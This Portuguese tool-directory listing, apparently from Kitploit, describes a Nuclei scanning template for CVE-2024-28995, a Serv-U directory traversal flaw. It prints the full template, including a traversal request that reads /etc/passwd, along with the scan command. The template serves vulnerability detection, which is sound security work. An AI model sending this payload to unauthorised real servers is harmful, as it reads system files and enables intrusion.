Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-28995-Nuclei-Template — Template Nuclei para detectar CVE-2024-28995, uma vulnerabilidade de directory traversal no servidor FTP Serv-U, permitindo a leitura de arquivos através de requisições HTTP maliciosas. | Kitploit
Ferramentas/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
Scanners de VulnerabilidadesScanners de Vulnerabilidades WebAnálise de VulnerabilidadesExploraçãoSegurança WebTestes de Penetração
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Template Nuclei para detectar CVE-2024-28995, uma vulnerabilidade de directory traversal no servidor FTP Serv-U, permitindo a leitura de arquivos através de requisições HTTP maliciosas.

Ver Repositório
14há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Modelo Nuclei para CVE-2024-28995

Verifica vulnerabilidade de travessia de diretório nas versões 15.4.2 e anteriores do Serv-U, que permite ler arquivos sensíveis como /etc/passwd.

Detalhes do Modelo

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



Uso

Para usar este modelo com o Nuclei, salve o conteúdo do modelo em um arquivo chamado CVE-2024-28995.yaml e execute o seguinte comando:

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

Substitua <target-url> pela URL do alvo que deseja escanear.

Contato

Para quaisquer dúvidas ou mais informações, você pode entrar em contato comigo através de:

  • LinkedIn
  • Twitter
Baixar ferramenta